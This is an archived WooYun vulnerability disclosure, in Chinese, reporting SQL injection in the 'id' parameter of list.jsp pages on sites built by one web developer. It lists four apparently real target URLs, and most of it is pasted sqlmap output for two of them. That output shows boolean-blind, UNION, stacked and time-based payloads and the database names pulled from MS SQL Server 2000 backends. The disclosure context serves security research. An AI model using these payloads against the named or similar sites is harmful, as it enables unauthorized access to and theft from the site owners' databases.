乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-02-11: 厂商已经主动忽略漏洞,细节向公众公开
接着某大牛的继续。
发现该公司开发的网站大部分都是JSP的只有少数是ASPX,就连企业站都是JSP,这样牛逼,另类,影响数量有这么大的建站公司在国内还是不多见的。官网:http://www.xiaheng.net/
http://wooyun.org/bugs/wooyun-2014-071836
他的这处参数为:XID
案例如下:http://www.shbo-xun.com/list.jsp?id=2http://www.yihengkx.com/list.jsp?id=2http://www.aohaosiyq.com/list.jsp?id=2http://jingkeleici.com/list.jsp?id=2
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2 AND 9892=9892 Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-1696 UNION ALL SELECT NULL, CHAR(58)+CHAR(99)+CHAR(117)+CHAR(110)+CHAR(58)+CHAR(86)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(122)+CHAR(116)+CHAR(66)+CHAR(67)+CHAR(72)+CHAR(97)+CHAR(58)+CHAR(116)+CHAR(100)+CHAR(108)+CHAR(58), NULL,NULL, NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=2; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=2 WAITFOR DELAY '0:0:5'-----[19:43:45] [INFO] testing MySQL[19:43:45] [WARNING] the back-end DBMS is not MySQL[19:43:45] [INFO] testing Oracle[19:43:45] [WARNING] the back-end DBMS is not Oracle[19:43:45] [INFO] testing PostgreSQL[19:43:46] [WARNING] the back-end DBMS is not PostgreSQL[19:43:46] [INFO] testing Microsoft SQL Server[19:43:46] [INFO] confirming Microsoft SQL Server[19:43:46] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: Apache 2.2.2, JSPback-end DBMS: Microsoft SQL Server 2000[19:43:46] [INFO] fetching database names[19:43:46] [INFO] the SQL query used returns 16 entries[19:43:47] [INFO] retrieved: "agency5"[19:43:47] [INFO] retrieved: "chinanewspaper"[19:43:47] [INFO] retrieved: "hetang"[19:43:47] [INFO] retrieved: "master"[19:43:47] [INFO] retrieved: "model"[19:43:47] [INFO] retrieved: "msdb"[19:43:47] [INFO] retrieved: "newspaper"[19:43:47] [INFO] retrieved: "Northwind"[19:43:48] [INFO] retrieved: "pubs"[19:43:48] [INFO] retrieved: "tempdb"[19:43:48] [INFO] retrieved: "xfsztdb"[19:43:48] [INFO] retrieved: "xiren16sjk"[19:43:48] [INFO] retrieved: "xiren17sjk"[19:43:48] [INFO] retrieved: "xiren1sjk"[19:43:48] [INFO] retrieved: "xiren2sjk"[19:43:48] [INFO] retrieved: "xiren3sjk"available databases [16]:[*] agency5[*] chinanewspaper[*] hetang[*] master[*] model[*] msdb[*] newspaper[*] Northwind[*] pubs[*] tempdb[*] xfsztdb[*] xiren16sjk[*] xiren17sjk[*] xiren1sjk[*] xiren2sjk[*] xiren3sjk[19:43:48] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[19:43:48] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.shbo-xun.com'
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2 AND 9167=9167 Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-9735 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(114)+CHAR(113)+CHAR(117)+CHAR(58)+CHAR(121)+CHAR(98)+CHAR(121)+CHAR(119)+CHAR(67)+CHAR(85)+CHAR(76)+CHAR(72)+CHAR(120)+CHAR(86)+CHAR(58)+CHAR(107)+CHAR(98)+CHAR(108)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=2; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=2 WAITFOR DELAY '0:0:5'-----[19:45:11] [INFO] testing MySQL[19:45:12] [WARNING] the back-end DBMS is not MySQL[19:45:12] [INFO] testing Oracle[19:45:12] [WARNING] the back-end DBMS is not Oracle[19:45:12] [INFO] testing PostgreSQL[19:45:12] [WARNING] the back-end DBMS is not PostgreSQL[19:45:12] [INFO] testing Microsoft SQL Server[19:45:12] [INFO] confirming Microsoft SQL Server[19:45:13] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: Apache 2.2.2, JSPback-end DBMS: Microsoft SQL Server 2000[19:45:13] [INFO] fetching database names[19:45:13] [INFO] the SQL query used returns 18 entries[19:45:13] [INFO] retrieved: "master"[19:45:13] [INFO] retrieved: "model"[19:45:13] [INFO] retrieved: "msdb"[19:45:13] [INFO] retrieved: "Northwind"[19:45:13] [INFO] retrieved: "pubs"[19:45:14] [INFO] retrieved: "survey"[19:45:14] [INFO] retrieved: "sztdb"[19:45:14] [INFO] retrieved: "tempdb"[19:45:14] [INFO] retrieved: "xiren11sjk"[19:45:14] [INFO] retrieved: "xiren12sjk"[19:45:14] [INFO] retrieved: "xiren13sjk"[19:45:14] [INFO] retrieved: "xiren14sjk"[19:45:14] [INFO] retrieved: "xiren15sjk"[19:45:14] [INFO] retrieved: "xiren4sjk"[19:45:15] [INFO] retrieved: "xiren5sjk"[19:45:15] [INFO] retrieved: "xiren6sjk"[19:45:15] [INFO] retrieved: "xiren7sjk"[19:45:15] [INFO] retrieved: "xiren8sjk"available databases [18]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] survey[*] sztdb[*] tempdb[*] xiren11sjk[*] xiren12sjk[*] xiren13sjk[*] xiren14sjk[*] xiren15sjk[*] xiren4sjk[*] xiren5sjk[*] xiren6sjk[*] xiren7sjk[*] xiren8sjk[19:45:15] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[19:45:15] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.yihengkx.com'
过滤~
未能联系到厂商或者厂商积极拒绝